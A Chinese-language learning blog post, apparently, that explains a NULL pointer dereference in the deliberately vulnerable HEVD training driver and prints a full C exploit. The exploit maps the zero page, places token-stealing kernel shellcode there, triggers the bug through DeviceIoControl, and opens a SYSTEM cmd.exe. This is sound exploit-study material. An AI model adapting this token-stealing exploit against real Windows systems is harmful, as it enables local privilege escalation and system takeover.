Wwoc
Wwoc

Windows内核漏洞学习-空指针解引用

0x00: 前言

​ 在看雪论坛看到许多关于HEVD的Windows内核漏洞教程,其中有一个是翻译国外的一个系列,感觉讲的很好,接下来就会跟着他将这个HEVD系列的漏洞走一遍了。昨天学了栈溢出,其实以前就学过,只不过没有操作过内核态的,今天继续学习空指针解引用,也是比较简单的漏洞,方便入门。

  • 传送门

0x01: 漏洞原理

首先看漏洞程序源码

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
     
    ULONG UserValue = 0;
    ULONG MagicValue = 0xBAD0B0B0;
    NTSTATUS Status = STATUS_SUCCESS;
    PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

    PAGED_CODE();

    __try {
     
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer,
                     sizeof(NULL_POINTER_DEREFERENCE),
                     (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

        // Allocate Pool chunk
        NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
                                  ExAllocatePoolWithTag(NonPagedPool,
                                                        sizeof(NULL_POINTER_DEREFERENCE),
                                                        (ULONG)POOL_TAG);

        if (!NullPointerDereference) {
     
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
     
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
        }

        // Get the value from user mode
        UserValue = *(PULONG)UserBuffer;

        DbgPrint("[+] UserValue: 0x%p\n", UserValue);
        DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

        // Validate the magic value
        if (UserValue == MagicValue) {
     
            NullPointerDereference->Value = UserValue;
            NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

            DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
            DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
        }
        else {
     
            DbgPrint("[+] Freeing NullPointerDereference Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

            // Free the allocated Pool chunk
            ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer
            NullPointerDereference = NULL;
        }

#ifdef SECURE
        // Secure Note: This is secure because the developer is checking if
        // 'NullPointerDereference' is not NULL before calling the callback function
        if (NullPointerDereference) {
     
            NullPointerDereference->Callback();
        }
#else
        DbgPrint("[+] Triggering Null Pointer Dereference\n");

        // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
        // because the developer is not validating if 'NullPointerDereference' is NULL
        // before calling the callback function
        NullPointerDereference->Callback();
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
     
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

​ 通过安全版和不安全版本的代码对比即可知道,安全版本在检验指针不为空的情况下再去调用 Callback回调函数,而不安全版本则不进行检查。阅读程序的流程:首先检验用户输入的数据是否等于一个魔数,如果检验通过则对 NullPointerDereference 的回调函数和值进行设置,如果不通过则将 NullPointerDereference 设置为NULL。在最后,即使指针为空也仍然去调用它的回调函数,这显然是不行,的当一个指针的值为空时,却被调用指向某一块内存地址时,就产生了空指针引用漏洞。

0x02:漏洞分析

通过在IDA里进行标注分析:当指针为空时,会call [4],所以当下所需要做的事就是传入一个不匹配的魔数,并在0x00000004分配一个双字地址。

Windows内核漏洞学习-空指针解引用_第1张图片

一开始可能会想,地址那么低怎么把Shellcode放到0x00000004的地址呢?Windows允许低权限用户去映射用户进程的上下文到0页。虽然我们使用 VirutalAlloc和VirtualAllocEx 在申请基地址低于0x00001000时候都会被拒绝访问,但是我们可以使用NtAllocateVirtualMemory来完成这个操作。

BaseAddress
期望内存基址指针。
当该值非零时,系统将计算此值的页对齐地址,尝试按照此地址申请内存块。
当该值等于零时,系统将寻找第一个未使用内存块。
当函数调用成功时,此参数亦将接收实际基址。

0x03:漏洞利用

首先申请到0页内存

PVOID BaseAddress= (PVOID)1;
SIZE_T RegionSize = 0x1000;
/* 这里对第二个参数进行解释 
BaseAddress
期望内存基址指针。
当该值非零时,系统将计算此值的页对齐地址,尝试按照此地址申请内存块。
当该值等于零时,系统将寻找第一个未使用内存块。
当函数调用成功时,此参数亦将接收实际基址。 */
printf("[+]Started to alloc zero page...\n");
if (!NT_SUCCESS(NtAllocateVirtualMemory(
    INVALID_HANDLE_VALUE,
    &BaseAddress,
    0,
    &RegionSize,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE)) || Zero_addr != NULL)
{
     
    printf("[+]Failed to alloc zero page!\n");
    system("pause");
    return 0;
}
 
printf("[+]Success to alloc zero page...\n");
printf("申请到的地址是 0x%p\n", BaseAddress);
*(DWORD*)(0x4) = (DWORD)& ShellCode;

可以看到成功申请到了0内存,所以接下来只需要将Shellcode存放在该地址即可。

Windows内核漏洞学习-空指针解引用_第2张图片
完整的代码为:

#include
#include

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define Null_Pointer_Dereference 0x22202b

HANDLE hDevice = NULL;

typedef NTSTATUS
(WINAPI* My_NtAllocateVirtualMemory)(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PULONG RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect
	);

My_NtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;

static VOID ShellCode()
{
     
	_asm
	{
     
		//int 3
		pushad
		mov eax, fs: [124h]		// Find the _KTHREAD structure for the current thread
		mov eax, [eax + 0x50]   // Find the _EPROCESS structure
		mov ecx, eax
		mov edx, 4				// edx = system PID(4)

		// The loop is to get the _EPROCESS of the system
		find_sys_pid :
		mov eax, [eax + 0xb8]	// Find the process activity list
		sub eax, 0xb8    		// List traversal
		cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
		jnz find_sys_pid

		// Replace the Token
		mov edx, [eax + 0xf8]
		mov[ecx + 0xf8], edx
		popad
		//int 3
		ret
	}
}

BOOL init()
{
     
	// Get HANDLE
	hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		NULL,
		NULL,
		OPEN_EXISTING,
		NULL,
		NULL);

	printf("[+]Start to get HANDLE...\n");
	if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
	{
     
		return FALSE;
	}
	printf("[+]Success to get HANDLE!\n");
	return TRUE;
}

static VOID CreateCmd()
{
     
	STARTUPINFO si = {
      sizeof(si) };
	PROCESS_INFORMATION pi = {
      0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = {
      L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

VOID Trigger_shellcode()
{
     
	DWORD bReturn = 0;
	char buf[4] = {
      0 };
	*(PDWORD32)(buf) = 0xBAD0B0B0+1;//测试申请到的地址时不加一即可

	*(FARPROC*)&NtAllocateVirtualMemory = GetProcAddress(
		GetModuleHandleW(L"ntdll"),
		"NtAllocateVirtualMemory");

	if (NtAllocateVirtualMemory == NULL)
	{
     
		printf("[+]Failed to get function NtAllocateVirtualMemory!!!\n");
		system("pause");
		return ;
	}

	PVOID Zero_addr = (PVOID)1;
	SIZE_T RegionSize = 0x1000;

	printf("[+]Started to alloc zero page...\n");
	if (!NT_SUCCESS(NtAllocateVirtualMemory(
		INVALID_HANDLE_VALUE,
		&Zero_addr,
		0,
		&RegionSize,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_READWRITE)) || Zero_addr != NULL)
	{
     
		printf("[+]Failed to alloc zero page!\n");
		system("pause");
		return ;
		
	}

	printf("[+]Success to alloc zero page...\n");
	printf("申请到的地址是 0x%p\n", Zero_addr);
	*(DWORD*)(0x4) = (DWORD)&ShellCode;

	DeviceIoControl(hDevice, Null_Pointer_Dereference, buf, 4, NULL, 0, &bReturn, NULL);
}

int main()
{
     

	if (init() == FALSE)
	{
     
		printf("[+]Failed to get HANDLE!!!\n");
		system("pause");
		return 0;
	}

	Trigger_shellcode();
	//__debugbreak();

	printf("[+]Start to Create cmd...\n");
	CreateCmd();
	system("pause");

	return 0;
}

利用成功

Windows内核漏洞学习-空指针解引用_第3张图片

0x04:明日计划

继续学习内核漏洞利用

你可能感兴趣的:(内核漏洞,学习记录)

  • 检测usb口HotPlug-netlink cany1000 linux
    为了完成内核空间与用户空间通信,Linux提供了基于Socket的NetLink通信机制。SELinux,Linux系统的防火墙分为内核态的netfilter和用户态的iptables,netfilter与iptables的数据交换就是通过Netlink机制完成。下面看一个检测usb口的例子:s32InitUsbHotPlug(void){s32nSockFd=0;//套接字地址structsoc
  • 日精进 石淑萍
    【早上好#淑萍#20230605日精进335】分享嘉宾:海明教练社群运营架构专家全域流量孵化教练个人品牌超千万利润打造高手基本的创业者,对于商业模式的设计都是有漏洞的。股权架构今天我们讲的商业模式主要是盈利模式。很多社群运营会做裂变,不会做转化,因为没有后端的设计。不断的去积累,思考有哪些模式,需要去如何设计。政策领域:政府补贴➕大学生技术/大学生创业团队盈利模型——赋能板块核心一:长期锁客—资格
  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621) OidBoy_G 漏洞复现安全web安全
    0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信指挥调度管理平台down_fil
  • Java学习笔记:atomic的实现原理? 曲钟人散
    在多线程的场景中,我们需要保证数据安全,就会考虑同步的方案,通常会使用synchronized或者lock来处理,使用了synchronized意味着内核态的一次切换。这是一个很重的操作。有没有一种方式,可以比较便利的实现一些简单的数据同步,比如计数器等等。concurrent包下的atomic提供我们这么一种轻量级的数据同步的选择。classMyThreadimplementsRunnable{
  • Linux系统及操作 (04) 3s不会飞 Linux基础常识linux运维服务器
    Linux系统及操作(03)RPM软件包网络下载对应软件包光盘镜像文件,具备软件包Windows系统软件包的管理可以指定安装位置安装是集中安装到一个目录Linux系统与Windows系统相反。常见的软件包(生态)类型电脑入侵99%都是通过软件包的漏洞进行的。window生态Android生态ios生态rpm软件包:扩展名为.rpm,适用于RedHat系统。deb软件包:扩展名为.deb适用于Deb
  • Nagios安装部署全攻略 weixin_34109408 memcachedphp操作系统
    概述:公司的生产机器一共有12台,2台LVS(主备)、2台nginx、2台tomcat、1台后台服务器(nginx_tomcat)、3台mysql(主+备+异地灾备)、1台图片服务器、2台memcached.可以看出网站的架构就是基于高可用的原理的,每个层面都做了主备、系统的PV不高,对于并发布,高性能没有那么苛求,对于系统安全、稳定有较高要求,前期已经对系统做了各种日志分析,WAF配置,漏洞扫面
  • C++中using namespace std的作用以及vector数组的使用 宁77吖 数据结构c++学习开发语言
    C++中usingnamespacestd的作用以及vector数组的使用本文为自我学习记录,主要包括C++中usingnamespacestd的作用vector数组的使用文章目录C++中usingnamespacestd的作用以及vector数组的使用一、usingnamespacestd二、vector数组2.1使用vector>和ints[][]定义二维数组区别2.2vector数组的插入,
  • 【C++】学习记录--Thread线程库的使用 KK虫 c++
    线程是进程的一个执行路径,是CPU调度与分配的的最小单元。创建线程需要一个可调用的函数或者函数对象作为线程的入口。C++11中可以通过函数指针/函数对象或者lambda表达式实现。基本语法#includethreadt(function_name,args...)'function_name'为程序入口点'args'为传递给函数的参数线程创建后,可以使用't.join*()'等待线程完成,或使用'
  • 03-10Linux的文件系统 圆缘1987
    Linux的文件系统:根文件系统(rootfs):rootfilesystemLSB,FHS/boot:引导文件存放目录:内核文件(vmlinuz),引导加载器(bootloader,grub)都存放于此目录/bin:供所有用户使用的基本命令;不能关联至独立分区,OS启动会用到的程序/sbin:管理类的基本命令;不能关联至独立分区,OS启动会用到的程序/lib:基本共享库文件,以及内核模块文件(/
  • XML语言的学习记录5- XSD time 前端项目xml学习前端
    XSD(XMLSchemaDefinition),定义XML文档的合法构建模块,分为简易元素(仅包含文本的元素,不会包含任何其他的元素或属性)和复合元素(包含其他元素及/或属性的XML元素)。1.内建的数据类型:xs:stringxs:decimalxs:integerxs:booleanxs:datexs:time2.示例:“xs:”XSD命名控件前缀;xmlns:xs="url"指定XMLSc
  • 网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题 程序员贵哥 网络安全xsssql安全网络安全web安全php
    网络安全问题一直是备受关注的话题,其中跨站脚本攻击(XSS)、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击(XSS)。XSS攻击是一种利用网站漏洞,将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本,当用户浏览该网站时,恶意脚本会被执行,从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
  • 字节-安全研究实习生(二面) Pluto-2003 安全面试题安全网络笔记面试题安全研究
    `1、你作为护网蓝队中级工程师研判岗,你在护网中做了些什么在护网行动中,我主要做了以下工作:安全监测与分析监控网络流量和系统日志,使用IDS/IPS等工具检测潜在的安全威胁。分析安全事件,确定是否为真正的攻击,并对事件进行分类和优先级排序。漏洞管理定期扫描网络和系统,识别已知漏洞。协调相关部门及时修补漏洞,减少攻击面。安全防护策略制定根据组织的业务需求和安全状况,制定和更新安全防护策略。确保安全策
  • 字节-安全研究实习生--一面 Pluto-2003 安全面试题安全web安全网络面试笔记安全研究
    `1、你投的岗位是安全研究实习生,你了解我们这边主要是做什么的吗作为安全研究实习生,我理解贵公司主要专注于网络安全领域,致力于保护信息系统免受各种威胁和攻击。这可能包括但不限于以下几个方面:漏洞研究:识别和分析软件、硬件以及网络中的安全漏洞,以便及时修复,防止被恶意利用。威胁情报:收集和分析关于网络威胁的数据,包括恶意软件、攻击者行为模式、漏洞利用技术等,以便更好地理解和防御潜在的网络攻击。安全策
  • 【Golang星辰图】抵御恶意攻击:利用Go语言的安全库构建可靠的应用程序 friklogff Golang星辰图golang安全开发语言
    加固你的代码:了解Go语言中的安全库和技术前言在当今数字化的世界中,保护代码和数据的安全性变得至关重要。恶意攻击、数据泄露和其他安全漏洞可能给我们的系统和用户带来巨大的风险和损失。为了增强软件的安全性和可靠性,我们需要利用现有的安全库来加固我们的应用程序和系统。本文将介绍一些常用的Go语言安全库,并提供详细的功能介绍和使用示例,帮助读者加强自己的代码和数据的安全性。欢迎订阅专栏:Golang星辰图
  • 由于 Positive Technologies 的专业知识,Moxa 消除了工业无线转换器中的一个漏洞。 ptsecurity PositiveTechnologies网络安全漏洞开发语言人工智能web安全网络安全网络
    我们的专家在NPortW2150A和W2250A转换器中发现了该漏洞-这些设备可将工业控制器、仪表和传感器连接到本地Wi-Fi网络。Moxa已根据负责任的披露政策通知了该威胁,并发布了软件更新。攻击者可以完全访问这些设备。PositiveTechnologies公司网络应用安全分析小组的专家VladimirRazov说:"一个特殊请求就足以做到这一点。通过控制转换器,攻击者可以向连接的工业控制器和
  • WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698) OidBoy_G 漏洞复现sqlweb安全安全
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。0x02漏洞概述WordPresspluginNotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分
  • Linux mkswap命令教程:如何设置Linux交换区(附实例详解和注意事项) 我要下东西噢 linuxlinux运维服务器
    Linuxmkswap命令介绍mkswap命令用于在设备或文件上设置Linux交换区。设备参数通常是磁盘分区(例如/dev/sdb7),但也可以是文件。Linux内核不查看分区ID,但许多安装脚本假定十六进制类型82(LINUX_SWAP)的分区是交换分区。Linuxmkswap命令适用的Linux版本mkswap命令适用于所有主流的Linux发行版,包括Debian、Ubuntu、Alpine、
  • 第10讲_Spring对Dao的支持 吴国友
    Spring框架优秀就是在于MVC开发的时候一旦需要对底层的数据库操作,它可以很好的支持JDBC技术,还有现在主流的ORM框架(Hibernate,MyBatis)技术。重点先介绍Spring对JDBC支持。在Spring对JDBC支持中提供了一个模板JdbcTemplate,此模板封装了对JDBC操作的许多方法,且消除了忽视资源释放而引起的漏洞Spring对JDBC操作需要导入的jar(开发环境
  • [学习记录]esp32通过wifi进行http请求获得天气信息 ZYbppp 学习http网络协议
    http协议解释本次使用的开发板为和宙esp32c3,使用的IDE为vscode+espidf程序整体流程:以下为程序详解WiFi连接首先使能nvs,将等下使用的WiFi账号及密码储存到nvs上NVS介绍:官方介绍比较繁杂。通俗来说,NVS就是在flash上分配的一块内存空间,提供给用户保存电不丢失的数据。进入主题,我们需要将esp32连接WiFi,此时使用为WIFISTATION模式,下面给出官
  • 快速搭建ARM64实验平台(QEMU虚拟机+Debian) SGchi Linux内核调试debian
    文章目录前言一、实验平台介绍二、安装步骤2.1安装工具2.2下载仓库2.3编译内核并制作根文件系统2.4运行刚才编译好的ARM64版本的Debian系统2.5在线安装软件包2.6在QEMU虚拟机和主机之间共享文件三、单步调试ARM64Linux内核参考资料前言最近翻阅笨叔的《奔跑吧Linux内核》卷2,发现了一个非常好用的ARM64的实验平台,这里对部署流程做一个记录。一、实验平台介绍该平台使用D
  • 2019.3.5 玲萍
    学习记录:我们需要一个使命!用生命去换来的,叫使命。没有使命的目标是不能够持续,不能够长远的!生命中是不是有一个部分不只是为自己的?找出自己的使命,使命是利他的。你的成功不只是为你自己而已。你会看到更伟大的,超乎你自己的。我的使命,力所能及的去帮助需要帮助的人。不管事情大小,本着真诚的心去帮助。应邀做了社区包花活动的志愿者,还有各种花作为酬劳,很开心!感谢海燕为我细心解说制作口红的工具,让我能快速
  • 淘宝客赚钱秘籍:如何快速找到漏洞单并获取差价利润 高省浮沉000018
    随着网络购物的盛行,越来越多的人开始涉足淘宝客领域。而在淘宝客赚钱的过程中,找到漏洞单也就变得尤为重要了。本文将向大家介绍淘宝客如何快速找漏洞单,需要用到哪些软件,并且提供高省app赚钱的操作方法,让你赚钱不再难。大家好!我是高省APP最大团队&联合创始人浮沉导师!【高省】APP网购优惠券免费领,分享还能赚钱。【高省】是一个自用省钱佣金高,分享推广赚钱多的平台。佣金更高,模式更好,终端用户不流失。
  • 有关程序员的幽默,你懂多少?,有关程序员的礼品 Java程序员笔记
    先上一副对联:上联:一个项目两部电脑三餐盒饭只为四千工资搞得五脏俱损六神无主仍然七点起床八点开会处理九个漏洞十分辛苦;下联:十年编码九年加班八面无光忙的七窍生烟到头六亲不认五体投地依旧四肢酸软三更加班只为二个臭钱一生孤苦;横批:苦逼程序员。warmingorerror某假日,一名男程开车带朋友出去玩。突然前方出现路标:警告!前方危险!但是程序员司机一点减速的趋势都没有。朋友大呼:“你没看到前面有警
  • 服务器网络丢包的原因及解决方案 q2827116259 网络服务器
    ■网络丢包的原因及解决方案网络丢包是指当网络状况不佳时,数据包的传输无法100%完成,导致数据传输出现漏洞和丢包。让我们来讨论网络丢包的故障现象和解决方案。1、网络丢包的故障现象是打开网页的速度特别慢,有时网页的某些内容或整个页面无法显示;QQ等即时通讯工具频繁掉线或提示登录超时;已设置为自动获取IP地址,但不能每次正常获取;下载文件的速度很慢,其中很大一部分故障是由数据包丢失引起的。2、使用pi
  • 编写Linux内核模块实现文件拷贝 双珵 linux
    经评论区反馈:如果Linux内核版本为4.XX,那么需要在vfs_read和vfs_write的地方更改为kernel_read和kernel_write操作系统课程实验1添加内核模块每个人题目都是自己选择的,题目1已经有一位校友给出了标准答案,我捣鼓的是文件拷贝这题,弄了很久也记录一下,给后面的学弟学妹参考题目4:设计一个带参数的模块,其参数为源文件和目标文件的文件名(可能带路径),模块功能是实
  • T2080 linux内核移植,T1042/T2080 U-BOOT 移植阶段(四)调试网口问题不通解决 weixin_39575758 T2080linux内核移植
    本次设计中,我们采用MEMAC4(RGMII)接口作为调试接口,但是发现网口并不通1.首先排查PHY的问题,phy有没有解复位结果:CPLD已经对PHY解复位,且插上网线后,phy'灯link亮,说明phy确实已经解复位2.使用mii命令,读取phy寄存器,插拔网线后观察寄存器的变化,是否正常反应出phy的down和up拔掉网线时phy的状态=>miidump111.(7969)--PHYstat
  • 鸿蒙内核系统 junwua harmonyos华为
    一、系统设计总纲1.1鸿蒙战略设计目标全场景1.2鸿蒙操作系统目标实现的技术支撑1.2.1分布式设计1.2.2一次开发,多端部署1.2.3系统与硬件解耦,弹性部署1.3鸿蒙操作系统技术架构1.3.1内核层1.3.2系统服务层1.3.3框架层1.3.4应用层1.4本章小结二、鸿蒙的特性和优点2.1可裁剪2.2虚拟超级终端2.3易开发OpenHarmony系统的本质特性分布式和软总线2.4.1分布式操
  • Linux 内核原子操作 android不会飞 Linux内核并发控制开发语言linux嵌入式硬件c语言
    本文主要介绍了原子操作的一些相关用法。目录文章目录前言一、原子操作二、整型原子操作1.设置原子变量的值2.获取原子变量的值3.原子变量加、减4.原子变量自增、自减5.操作三、位原子操作example使用原子变量使设备只能被一个进程打开前言本文主要介绍了原子操作的一些相关用法。用于记录。一、原子操作原子操作可以保证对一个整型数据的修改是排他性的。Linux内核提供了一系列函数来实现内核中的原子操作,
  • 51单片机与ARM单片机的区别 嵌入式Stark 硬件单片机51单片机arm开发
    51的MCU与ARM的MCU的区别51单片机与ARM单片机区别主要体现在以下几个方面:指令集架构(ISA):51单片机:基于Intel8051架构,采用的是CISC(复杂指令集计算机)设计,其指令集相对较复杂,最初是8位架构,后来出现了增强型的8051内核变种,但仍保持8位数据路径和地址总线。ARM单片机:基于ARM架构,采用的是RISC(精简指令集计算机)设计,强调指令集的简洁性和执行效率,普遍
  • 146 Linux 网络编程2 ,Socket编程,如何创建Linux 服务器 和linux 客户端 hunandede 服务器linux网络
    IP+port就是一个程序在网络上的身份证号码。这意味着我们需要如果写一个服务器,至少需要将这台服务器的ip和端口号写到程序里面。实际上更细化的说:应该是将这三都写进程序里面:IP类型(IPV4或者IPV6),IP地址(192.168.39.78),端口号(900)套接字概念Socket本身有“插座”的意思,在Linux环境下,用于表示进程间网络通信的特殊文件类型。本质为内核借助缓冲区形成的伪文件
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
